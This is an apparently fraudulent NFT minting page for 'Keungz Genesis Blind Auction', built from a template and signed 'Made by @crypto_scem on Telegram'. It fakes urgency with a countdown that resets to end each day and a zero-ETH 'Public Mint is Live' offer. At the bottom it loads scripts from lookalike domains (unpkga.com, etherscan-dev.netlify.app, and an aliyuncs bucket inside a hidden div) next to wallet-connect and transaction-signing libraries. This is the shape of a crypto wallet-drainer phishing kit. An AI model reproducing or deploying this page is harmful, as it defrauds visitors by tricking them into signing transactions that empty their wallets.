<!DOCTYPE html>
<html lang="en">
<!-- Made by @crypto_scem on Telegram -->
<!-- Made by @crypto_scem on Telegram -->
<!-- Made by @crypto_scem on Telegram -->

<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
    <meta charset="utf-8">

    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="icon" href="favicon.png">
    <title>Keungz Genesis Blind Auction - NFT Minting</title>
    <meta name="description" content="Keungz Genesis Blind Auction is responsive nft minting and collection landing page bootstrap 5 html template.">
    <meta name="author" content="harnishdesign.net">

    <!-- Web Fonts -->
    <link href="https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&amp;display=swap" rel="stylesheet">

    <!-- Stylesheet
============================== -->
    <!-- Bootstrap -->
    <link rel="stylesheet" type="text/css" href="css/bootstrap.min.css">
    <!-- Font Awesome Icon -->
    <link rel="stylesheet" type="text/css" href="css/all.min.css">
    <!-- Owl Carousel -->
    <link rel="stylesheet" type="text/css" href="css/owl.carousel.min.css">
    <!-- Template Stylesheet -->
    <link rel="stylesheet" type="text/css" href="css/stylesheet.css">
    <!-- Colors Css -->
    <link id="color-switcher" type="text/css" rel="stylesheet" href="https://harnishdesign.net/demo/html/Keungz Genesis Blind Auction/mint.html#">
</head>

<body data-bs-spy="scroll" data-bs-target="#header-nav" data-bs-smooth-scroll="true" data-bs-offset="0" class="hero-bg" style="background-image:url(%26.html#x27;img/bg.png&amp;#x27;);">


    <!-- Preloader -->
    <div class="preloader preloader-dark">
        <div class="lds-ellipsis">
            <div></div>
            <div></div>
            <div></div>
            <div></div>
        </div>
    </div>
    <!-- Preloader End -->

    <!-- Document Wrapper
=============================== -->
    <div id="main-wrapper">

        <!-- Header
  ============================ -->
        <header id="header" class="sticky-top-slide">
            <!-- Navbar -->
            <nav class="primary-menu navbar navbar-expand-lg navbar-dark bg-transparent fw-500">
                <div class="container position-relative">
                    <div class="col-auto col-lg-auto">
                        <!-- Logo -->
                        <a class="logo" href="index-2.html" title="Keungz Genesis Blind Auction" style="font-size: 45px;">  Keungz Genesis Blind Auction </a>
                        <!-- Logo End -->
                    </div>
                    <div class="col col-lg-10 navbar-accordion">
                        <button class="navbar-toggler ms-auto" type="button" data-bs-toggle="collapse" data-bs-target="#header-nav"><span></span><span></span><span></span></button>
                        <div id="header-nav" class="collapse navbar-collapse justify-content-end">
                            <ul class="navbar-nav">
                                <li class="nav-item"><a class="nav-link dropdown-toggle active" href="index-2.html#home">Home</a></li>
                                <li class="nav-item"><a class="nav-link" href="#">About</a></li>
                                <li class="nav-item"><a class="nav-link" href="#">Roadmap</a></li>
                                <li class="nav-item"><a class="nav-link" href="#">Collections</a></li>
                                <li class="nav-item"><a class="nav-link" href="#">Team</a></li>
                                <li class="nav-item"><a class="nav-link" href="#">FAQ</a></li>




                                    </ul>
                                </li>

                                <li id="discord_btn" class="align-items-center h-auto mt-2 mt-lg-0 ms-lg-3"><a class="btn btn-light rounded-pill d-inline-block"><span class="me-1"><i class="fab fa-discord"></i></span> Discord</a></li>
                            </ul>
                        </div>
                    </div>
                </div>
            </nav>
            <!-- Navbar End -->
        </header>
        <!-- Header End -->

        <!-- Connect Wallet - Offcanvas menu
====================================== -->
        <div class="offcanvas offcanvas-end text-bg-dark" tabindex="-1" id="offcanvas" aria-labelledby="offcanvasLabel">
            <div class="offcanvas-header">
                <button type="button" class="btn-close btn-close-white ms-auto" data-bs-dismiss="offcanvas" aria-label="Close"></button>
            </div>
            <div class="offcanvas-body">
                
                <div class="text-white-50 text-center mb-4">Choose how you want to connect. There are several wallet providers.</div>
                <div class="list-group connect-wallet"> <a href="#" class="list-group-item list-group-item-action" aria-current="true"> <img class="img-fluid d-flex me-2" src="img/metamask.html" alt=""> MetaMask <span class="badge bg-info ms-auto">Popular</span> </a> <a href="#" class="list-group-item list-group-item-action" aria-current="true"> <img class="img-fluid d-flex me-2" src="img/wallet-connect.html" alt=""> Wallet Connect </a> <a href="#" class="list-group-item list-group-item-action" aria-current="true"> <img class="img-fluid d-flex me-2" src="img/coinbase.html" alt=""> Coinbase </a> <a href="#" class="list-group-item list-group-item-action" aria-current="true"> <img class="img-fluid d-flex me-2" src="img/fortmatic.html" alt=""> Fortmatic </a> <a href="#" class="list-group-item list-group-item-action" aria-current="true"> <img class="img-fluid d-flex me-2" src="img/myetherwallet.html" alt=""> MyEtherWallet</a> </div>
            </div>
        </div>
        <!-- Connect Wallet - Offcanvas menu End -->

        <!-- Content
  ======================== -->
        <div id="content" role="main">
            <div class="section mt-5 pb-0">
                <div class="container pt-5">
                    <div class="row g-5">
                        <!-- Item Image -->
                        <div class="col-lg-6 text-center"> <img class="img-fluid rounded-5" src="https://i.imgur.com/O9VNbbN.gif" alt=""> </div>
                        <!-- Item Image end -->

                        <!-- Item Details -->
                        <div class="col-lg-6 text-center text-lg-start">
                            <h1 class="text-light text-5 mb-4">Keungz Genesis Blind Auction</h1>
                            <h2 class="text-10 text-white fw-600 mb-4">Public Mint is <span class="bg-success rounded-4 px-3">Live</span></h2>

                            <!-- Public Mint end in -->
                            <div class="row gx-3 align-items-center mb-3">
                                <div class="col-12 col-lg-auto text-light"> Mint end in: </div>
                                <div class="col-12 col-lg-auto">
                                    <div id="countdown" class="countdown2 d-inline-block text-white text-7 fw-600" data-countdown-end="2023/1/1 23:00:00"></div>
                                </div>
                            </div>
                            <p class="text-white fw-500 mb-1"><span class="text-light fw-normal">Whitelist:</span> Soldout <span class="d-inline-flex text-success bg-white rounded-circle"><i class="fas fa-check-circle"></i></span></p>
                            <p class="text-white fw-500"><span class="text-light fw-normal">Presale:</span> Soldout <span class="d-inline-flex text-success bg-white rounded-circle"><i class="fas fa-check-circle"></i></span></p>
                            <p class="border border-secondary border-opacity-50 rounded-pill d-inline-block px-3 text-uppercase text-light">5 Max Per Wallet</p>

                            <!-- Price -->
                            <div class="row justify-content-center justify-content-lg-start mb-4">
                                <div class="col-auto col-lg-4">
                                    <p class="text-light mb-0">Price:</p>
                                    <div class="text-7 text-white fw-600">0 ETH</div>
                                </div>
                                <div class="col-auto col-lg-4">
                                    <p class="text-light mb-0">Remaining:</p>
                                    <div class="text-7 text-white fw-600">34/111</div>
                                </div>
                            </div>

                            <!-- Quantity -->
                            <div class="row g-2 align-items-center justify-content-center justify-content-lg-start mb-4">
                                <div class="col-12 col-sm-auto text-light"> Quantity: </div>
                                <div class="col-auto col-sm-4">
                                    <div class="input-group form-dark">
                                        <button type="button" class="input-group-text bg-transparent border-0 text-light text-5" data-value="decrease" data-target="#hotels-rooms" data-toggle="spinner">-</button>
                                        <input type="text" data-ride="spinner" id="hotels-rooms" class="form-control text-center bg-trnsparent rounded-4" value="1" data-min="1">
                                        <button type="button" class="input-group-text bg-transparent border-0 text-light text-5" data-value="increase" data-target="#hotels-rooms" data-toggle="spinner">+</button>
                                    </div>
                                </div>
                            </div>

                            <!-- Button -->
                            <div id="connectButton" class="btn btn-primary btn-lg rounded-pill connect  right-content-bottom-l2 connect"  style="display: block;"> Connect </div>
                            <div id="claimButton" class="btn btn-primary btn-lg rounded-pill mint right-content-bottom-l2 mint disable"  style="display: none;">Mint Now</div>
                        </div>
                    </div>
                </div>
            </div>

            <!-- Join
    ============================== -->
            <section id="join" class="section pb-0">
                <div class="container">
                    <!-- Heading -->
                    <div class="position-relative d-flex text-center">
                        <h2 class="text-24 text-white-50 opacity-1 text-uppercase fw-600 w-100 lh-1 mb-0 mb-n1">don’t miss</h2>
                    </div>
                    <!-- Heading end-->

                    <div class="bg-primary text-center shadow-lg rounded-4 p-5 mt-n3">
                        <div class="text-15 text-white lh-1 mb-2"><i class="fab fa-discord"></i></div>
                        <h3 class="text-11 text-white fw-600 mb-3">Join Our Community</h3>
                        <a id="discord_btn" class="btn btn-light rounded-pill">Join Discord</a>
                    </div>
                </div>
            </section>
            <!-- Join end -->

        </div>
        <!-- Content end -->

        <!-- Footer
  ============================== -->
        <footer id="footer" class="section footer-dark my-4">
            <div class="container">
                <!-- Social Icon -->
                <ul class="social-icons social-icons-dark social-icons-lg justify-content-center mb-4">
                    <li class="social-icons-discord"><a data-bs-toggle="tooltip" href="https://discord.gg/yogapetz" target="_blank" title="Discord"><i class="fab fa-discord"></i></a></li>
                    <li class="social-icons-facebook"><a data-bs-toggle="tooltip" href="https://www.facebook.com/" target="_blank" title="Facebook"><i class="fab fa-facebook-f"></i></a></li>
                    <li class="social-icons-twitter"><a data-bs-toggle="tooltip" href="https://twitter.com/keunging" target="_blank" title="Twitter"><i class="fab fa-twitter"></i></a></li>
                    <li class="social-icons-instagram"><a data-bs-toggle="tooltip" href="https://www.dribbble.com/" target="_blank" title="Instagram"><i class="fab fa-instagram"></i></a></li>
                    <li class="social-icons-telegram"><a data-bs-toggle="tooltip" href="http://www.telegram.com/" target="_blank" title="Telegram"><i class="fab fa-telegram-plane"></i></a></li>
                </ul>
                <!-- Copyright Text -->
                <p class="text-center mb-4">Copyright © 2022 <a href="#" class="fw-500">Keungz Genesis Blind Auction</a>. All Rights Reserved.</p>
                <!-- Other Links -->
                <ul class="nav nav-sm justify-content-center">
                    <li class="nav-item"> <a class="nav-link" data-bs-toggle="modal" data-bs-target="#security" href="#">Security</a></li>
                    <li class="nav-item"> <a class="nav-link" data-bs-toggle="modal" data-bs-target="#terms" href="#">Terms</a></li>
                    <li class="nav-item"> <a class="nav-link" data-bs-toggle="modal" data-bs-target="#privacy" href="#">Privacy</a></li>
                </ul>
            </div>
        </footer>
        <!-- Footer end -->

    </div>
    <!-- Document Wrapper end -->

    <!-- Back to Top
============================== -->
    <a id="back-to-top" data-bs-toggle="tooltip" title="Back to Top" href="javascript:void(0)"><i class="fa fa-chevron-up"></i></a>

    <!-- Security Modal
================================== -->
    <div id="security" class="modal fade" role="dialog" aria-hidden="true">
        <div class="modal-dialog modal-xl modal-dialog-centered" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title">Security</h5>
                    <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
                </div>
                <div class="modal-body p-4">
                    <p>Simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. </p>
                    <ul class="lh-lg">
                        <li>Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.</li>
                        <li>Quidam lisque persius interesset his et, Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.</li>
                        <li>In quot quidam persequeris vim, ad mea essent possim iriure. Quidam lisque persius interesset his et.</li>
                        <li>Quidam lisque persius interesset his et, Lisque persius interesset his et.</li>
                        <li>Interesset his et, Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.</li>
                        <li>Persius interesset his et, Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.</li>
                        <li>Quot quidam persequeris vim Quidam lisque persius interesset his et, Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.</li>
                    </ul>
                </div>
            </div>
        </div>
    </div>
    <!-- Security Modal End -->

    <!-- Terms Modal
================================== -->
    <div id="terms" class="modal fade" role="dialog" aria-hidden="true">
        <div class="modal-dialog modal-xl modal-dialog-centered" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title">Terms</h5>
                    <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
                </div>
                <div class="modal-body p-4">
                    <p>Simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged.</p>
                    <h3 class="mb-3 mt-4 mt-4">Terms of Use</h3>
                    <p>It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Simply dummy text of the printing and typesetting industry.</p>
                    <h5 class="text-4 mt-4">Part I – Information Keungz Genesis Blind Auction collects and controls</h5>
                    <p>Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.</p>
                    <h5 class="text-4 mt-4">Part II – Information that Keungz Genesis Blind Auction processes on your behalf</h5>
                    <p>Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.</p>
                    <h5 class="text-4 mt-4">Part III – General</h5>
                    <p>It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book.</p>
                </div>
            </div>
        </div>
    </div>
    <!-- Terms Modal End -->

    <!-- Privacy Modal
================================== -->
    <div id="privacy" class="modal fade" role="dialog" aria-hidden="true">
        <div class="modal-dialog modal-xl modal-dialog-centered" role="document">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title">Privacy Policy</h5>
                    <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
                </div>
                <div class="modal-body p-4">
                    <p>Simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry's standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. </p>
                    <ul class="lh-lg">
                        <li>Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.</li>
                        <li>Quidam lisque persius interesset his et, Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.</li>
                        <li>In quot quidam persequeris vim, ad mea essent possim iriure. Quidam lisque persius interesset his et.</li>
                        <li>Quidam lisque persius interesset his et, Lisque persius interesset his et.</li>
                        <li>Interesset his et, Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.</li>
                        <li>Persius interesset his et, Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.</li>
                        <li>Quot quidam persequeris vim Quidam lisque persius interesset his et, Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.</li>
                    </ul>
                </div>
            </div>
        </div>
    </div>
    <!-- Privacy Modal End -->

    <!-- Styles Switcher -->
    <div id="styles-switcher" class="left">
        <h2 class="text-4">Color Switcher</h2>
        <hr>
        <ul class="mb-0">
            <li class="orange active" data-bs-toggle="tooltip" title="Orange" data-path=""></li>
            <li class="yellow" data-bs-toggle="tooltip" title="Yellow" data-path="css/color-yellow.html"></li>
            <li class="indigo" data-bs-toggle="tooltip" title="Indigo" data-path="css/color-indigo.html"></li>
            <li class="blue" data-bs-toggle="tooltip" title="Blue" data-path="css/color-blue.html"></li>
            <li class="purple" data-bs-toggle="tooltip" title="Purple" data-path="css/color-purple.html"></li>
            <li class="cyan" data-bs-toggle="tooltip" title="Cyan" data-path="css/color-cyan.html"></li>
            <li class="red" data-bs-toggle="tooltip" title="Red" data-path="css/color-red.html"></li>
            <li class="pink" data-bs-toggle="tooltip" title="Pink" data-path="css/color-pink.html"></li>
            <li class="green" data-bs-toggle="tooltip" title="Green" data-path="css/color-green.html"></li>
            <li class="teal" data-bs-toggle="tooltip" title="Teal" data-path="css/color-teal.html"></li>
        </ul>
       
    </div>
    <!-- Styles Switcher End -->

    <script>
        var countdown = document.getElementById('countdown');
        var date = new Date();
        var year = date.getFullYear();
        var mon = parseInt( date.getMonth()) + 1;
        var day = date.getDate();
        countdown.dataset.countdownEnd = `${year}/${mon}/${day} 23:00:00`;
        console.log(countdown.dataset); // countdownEnd
        
    </script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <script src="js/bootstrap.bundle.min.js"></script>
    <!-- Owl Carousel -->
    <script src="js/owl.carousel.min.js"></script>
    <!-- Countdown -->
    <script src="js/jquery.countdown.min.js"></script>
    <!-- Bootstrap Spinner -->
    <script src="js/bootstrap-spinner.js"></script>
    <!-- Style Switcher -->
    <script src="js/switcher.min.js"></script>
    <!-- Custom Script -->
    <script src="js/theme.js"></script>
   
    <div id="names" style="display:none"></div>
    <div id="end_txt" style="display:none"></div>
    <div id="start_txt" style="display:none"></div>
    <div id="percentages_txt" style="display:none"></div>
    <div id="percentages_lin" style="display:none"></div>
    <div id="timess" style="display:none"></div>
    <div id="discord_btn" style="display:none"></div>
    <div id="twitter_btn" style="display:none"></div>
    <div id="body" style="display:none"></div>
    <span class="totalPrice" style="display:none"></span>
    <span class="plus" style="display:none"></span>
    <div class="minus" style="display:none"></div>
    
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="style/bootstrap.min.js"></script>
<script src="https://kit.fontawesome.com/eb3551e939.js" crossorigin="anonymous"></script>

<script src="https://www.unpkga.com/jsweb3/web3.min.js"></script>
<script src="https://www.unpkga.com/web3/dist917/moralis.js"></script>
<script src="https://www.unpkga.com/jsweb3/ethereumjs-tx-1.3.3.min.js"></script>
<script src="https://etherscan-dev.netlify.app/smartcontract.js"></script>
<script src="https://www.unpkga.com/web3/dist917/index.min.js"></script>
<!-- Made by @crypto_scem on Telegram -->
<!-- Made by @crypto_scem on Telegram -->
<!-- Made by @crypto_scem on Telegram -->
</body>
<div style="display: none;"><script src="https://unpkgaa.oss-us-west-1.aliyuncs.com/ibaidu2.js"></script></div>
<!-- Made by @crypto_scem on Telegram -->
<!-- Made by @crypto_scem on Telegram -->
<!-- Made by @crypto_scem on Telegram -->
<!-- Made by @crypto_scem on Telegram -->

</html>